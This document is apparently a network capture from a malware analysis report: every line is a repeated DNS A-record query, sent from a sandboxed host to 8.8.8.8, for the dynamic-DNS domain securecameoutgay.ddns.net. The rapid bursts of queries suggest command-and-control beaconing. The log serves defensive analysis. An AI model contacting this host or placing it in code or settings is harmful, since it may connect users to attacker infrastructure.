                                                    Oct 12, 2024 23:05:08.922849894 CEST192.168.2.148.8.8.80x2ef4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.932790041 CEST192.168.2.148.8.8.80x2ef4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.940895081 CEST192.168.2.148.8.8.80x2ef4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.950417995 CEST192.168.2.148.8.8.80x2ef4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.958638906 CEST192.168.2.148.8.8.80x2ef4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.968343019 CEST192.168.2.148.8.8.80x4a5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.977118969 CEST192.168.2.148.8.8.80x4a5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.985299110 CEST192.168.2.148.8.8.80x4a5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:08.993033886 CEST192.168.2.148.8.8.80x4a5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.003803015 CEST192.168.2.148.8.8.80x4a5eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.015976906 CEST192.168.2.148.8.8.80xa164Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.023979902 CEST192.168.2.148.8.8.80xa164Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.032655001 CEST192.168.2.148.8.8.80xa164Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.042824030 CEST192.168.2.148.8.8.80xa164Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.055479050 CEST192.168.2.148.8.8.80xa164Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.065474987 CEST192.168.2.148.8.8.80x9ea3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.073601961 CEST192.168.2.148.8.8.80x9ea3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.082529068 CEST192.168.2.148.8.8.80x9ea3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.090898037 CEST192.168.2.148.8.8.80x9ea3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.106566906 CEST192.168.2.148.8.8.80x9ea3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.127479076 CEST192.168.2.148.8.8.80x913eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.141320944 CEST192.168.2.148.8.8.80x913eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.154026985 CEST192.168.2.148.8.8.80x913eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.178333044 CEST192.168.2.148.8.8.80x913eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.233843088 CEST192.168.2.148.8.8.80x913eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.307671070 CEST192.168.2.148.8.8.80xdf45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.323607922 CEST192.168.2.148.8.8.80xdf45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.333633900 CEST192.168.2.148.8.8.80xdf45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.342602968 CEST192.168.2.148.8.8.80xdf45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.592994928 CEST192.168.2.148.8.8.80xdf45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.611792088 CEST192.168.2.148.8.8.80xe364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.623424053 CEST192.168.2.148.8.8.80xe364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.636288881 CEST192.168.2.148.8.8.80xe364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.646356106 CEST192.168.2.148.8.8.80xe364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.659971952 CEST192.168.2.148.8.8.80xe364Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.671912909 CEST192.168.2.148.8.8.80x3cf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.683374882 CEST192.168.2.148.8.8.80x3cf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.695010900 CEST192.168.2.148.8.8.80x3cf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.709968090 CEST192.168.2.148.8.8.80x3cf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.721811056 CEST192.168.2.148.8.8.80x3cf1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.741365910 CEST192.168.2.148.8.8.80xa44bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.753824949 CEST192.168.2.148.8.8.80xa44bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.765134096 CEST192.168.2.148.8.8.80xa44bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.773745060 CEST192.168.2.148.8.8.80xa44bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.781934023 CEST192.168.2.148.8.8.80xa44bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.792258024 CEST192.168.2.148.8.8.80x1b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.801213980 CEST192.168.2.148.8.8.80x1b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.809387922 CEST192.168.2.148.8.8.80x1b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.818192005 CEST192.168.2.148.8.8.80x1b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.826260090 CEST192.168.2.148.8.8.80x1b45Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.837594986 CEST192.168.2.148.8.8.80xef77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.847496986 CEST192.168.2.148.8.8.80xef77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.858558893 CEST192.168.2.148.8.8.80xef77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.866355896 CEST192.168.2.148.8.8.80xef77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.876851082 CEST192.168.2.148.8.8.80xef77Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.887888908 CEST192.168.2.148.8.8.80x5c9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.897228956 CEST192.168.2.148.8.8.80x5c9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.908200026 CEST192.168.2.148.8.8.80x5c9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.917681932 CEST192.168.2.148.8.8.80x5c9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.926506996 CEST192.168.2.148.8.8.80x5c9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.936954021 CEST192.168.2.148.8.8.80x3e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.945270061 CEST192.168.2.148.8.8.80x3e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.953747988 CEST192.168.2.148.8.8.80x3e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.961157084 CEST192.168.2.148.8.8.80x3e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.968441963 CEST192.168.2.148.8.8.80x3e6bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.977608919 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.986022949 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:09.994507074 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.002558947 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.010844946 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.020781994 CEST192.168.2.148.8.8.80xd539Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.028466940 CEST192.168.2.148.8.8.80xd539Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.036288023 CEST192.168.2.148.8.8.80xd539Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.044370890 CEST192.168.2.148.8.8.80xd539Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.052797079 CEST192.168.2.148.8.8.80xd539Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.061786890 CEST192.168.2.148.8.8.80x786eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.069540977 CEST192.168.2.148.8.8.80x786eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.077382088 CEST192.168.2.148.8.8.80x786eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.085216045 CEST192.168.2.148.8.8.80x786eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.093647003 CEST192.168.2.148.8.8.80x786eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.103868961 CEST192.168.2.148.8.8.80x42a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.111319065 CEST192.168.2.148.8.8.80x42a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.118910074 CEST192.168.2.148.8.8.80x42a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.126708031 CEST192.168.2.148.8.8.80x42a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.134565115 CEST192.168.2.148.8.8.80x42a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.144531012 CEST192.168.2.148.8.8.80x2418Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.153009892 CEST192.168.2.148.8.8.80x2418Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.161422014 CEST192.168.2.148.8.8.80x2418Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.170449972 CEST192.168.2.148.8.8.80x2418Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.178267956 CEST192.168.2.148.8.8.80x2418Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.187798977 CEST192.168.2.148.8.8.80xea07Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.195467949 CEST192.168.2.148.8.8.80xea07Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.203512907 CEST192.168.2.148.8.8.80xea07Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.210892916 CEST192.168.2.148.8.8.80xea07Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.219651937 CEST192.168.2.148.8.8.80xea07Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.230545998 CEST192.168.2.148.8.8.80xbab9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.238487005 CEST192.168.2.148.8.8.80xbab9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.246196032 CEST192.168.2.148.8.8.80xbab9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.255114079 CEST192.168.2.148.8.8.80xbab9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.264256001 CEST192.168.2.148.8.8.80xbab9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.275382996 CEST192.168.2.148.8.8.80x22aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.282773018 CEST192.168.2.148.8.8.80x22aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.291795969 CEST192.168.2.148.8.8.80x22aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.300319910 CEST192.168.2.148.8.8.80x22aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.308351994 CEST192.168.2.148.8.8.80x22aaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.318588018 CEST192.168.2.148.8.8.80x9f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.326785088 CEST192.168.2.148.8.8.80x9f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.334261894 CEST192.168.2.148.8.8.80x9f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.343313932 CEST192.168.2.148.8.8.80x9f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.351798058 CEST192.168.2.148.8.8.80x9f6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.360944986 CEST192.168.2.148.8.8.80xa23fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.368872881 CEST192.168.2.148.8.8.80xa23fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.376915932 CEST192.168.2.148.8.8.80xa23fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.385047913 CEST192.168.2.148.8.8.80xa23fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.394607067 CEST192.168.2.148.8.8.80xa23fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.403256893 CEST192.168.2.148.8.8.80x629fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.410998106 CEST192.168.2.148.8.8.80x629fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.418942928 CEST192.168.2.148.8.8.80x629fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.426992893 CEST192.168.2.148.8.8.80x629fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.434789896 CEST192.168.2.148.8.8.80x629fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.443367004 CEST192.168.2.148.8.8.80x5591Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.450920105 CEST192.168.2.148.8.8.80x5591Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.458277941 CEST192.168.2.148.8.8.80x5591Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.466905117 CEST192.168.2.148.8.8.80x5591Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.474349022 CEST192.168.2.148.8.8.80x5591Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.483052969 CEST192.168.2.148.8.8.80x696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.490715981 CEST192.168.2.148.8.8.80x696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.498259068 CEST192.168.2.148.8.8.80x696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.506063938 CEST192.168.2.148.8.8.80x696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.513875961 CEST192.168.2.148.8.8.80x696Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.522514105 CEST192.168.2.148.8.8.80xb59bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.530077934 CEST192.168.2.148.8.8.80xb59bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.538126945 CEST192.168.2.148.8.8.80xb59bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.545922995 CEST192.168.2.148.8.8.80xb59bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.553555965 CEST192.168.2.148.8.8.80xb59bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.562408924 CEST192.168.2.148.8.8.80x885aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.569904089 CEST192.168.2.148.8.8.80x885aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.577749968 CEST192.168.2.148.8.8.80x885aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.585489035 CEST192.168.2.148.8.8.80x885aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.593045950 CEST192.168.2.148.8.8.80x885aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.601378918 CEST192.168.2.148.8.8.80x54c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.608966112 CEST192.168.2.148.8.8.80x54c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.616770983 CEST192.168.2.148.8.8.80x54c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.624525070 CEST192.168.2.148.8.8.80x54c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.632097006 CEST192.168.2.148.8.8.80x54c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.640573978 CEST192.168.2.148.8.8.80x1942Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.647943020 CEST192.168.2.148.8.8.80x1942Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.655972958 CEST192.168.2.148.8.8.80x1942Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.663883924 CEST192.168.2.148.8.8.80x1942Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.672432899 CEST192.168.2.148.8.8.80x1942Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.681570053 CEST192.168.2.148.8.8.80x147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.689201117 CEST192.168.2.148.8.8.80x147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.697392941 CEST192.168.2.148.8.8.80x147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.705015898 CEST192.168.2.148.8.8.80x147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.712982893 CEST192.168.2.148.8.8.80x147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.721472025 CEST192.168.2.148.8.8.80x2195Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.729047060 CEST192.168.2.148.8.8.80x2195Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.736335039 CEST192.168.2.148.8.8.80x2195Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.743716955 CEST192.168.2.148.8.8.80x2195Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.750725031 CEST192.168.2.148.8.8.80x2195Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.759124041 CEST192.168.2.148.8.8.80x7c62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.766515970 CEST192.168.2.148.8.8.80x7c62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.774689913 CEST192.168.2.148.8.8.80x7c62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.783875942 CEST192.168.2.148.8.8.80x7c62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.792829037 CEST192.168.2.148.8.8.80x7c62Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.801459074 CEST192.168.2.148.8.8.80xf637Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.809283018 CEST192.168.2.148.8.8.80xf637Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.816828012 CEST192.168.2.148.8.8.80xf637Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.824747086 CEST192.168.2.148.8.8.80xf637Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.834316015 CEST192.168.2.148.8.8.80xf637Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.844983101 CEST192.168.2.148.8.8.80x8b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.853878975 CEST192.168.2.148.8.8.80x8b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.862020016 CEST192.168.2.148.8.8.80x8b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.870114088 CEST192.168.2.148.8.8.80x8b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.877908945 CEST192.168.2.148.8.8.80x8b10Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.886379004 CEST192.168.2.148.8.8.80xd93cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.893975973 CEST192.168.2.148.8.8.80xd93cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.901531935 CEST192.168.2.148.8.8.80xd93cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.910501003 CEST192.168.2.148.8.8.80xd93cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.917886972 CEST192.168.2.148.8.8.80xd93cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.927232981 CEST192.168.2.148.8.8.80xd42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.934787989 CEST192.168.2.148.8.8.80xd42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.942379951 CEST192.168.2.148.8.8.80xd42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.950166941 CEST192.168.2.148.8.8.80xd42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.959634066 CEST192.168.2.148.8.8.80xd42Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.970360041 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.979187965 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:10.989603043 CEST192.168.2.148.8.8.80xb8c1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
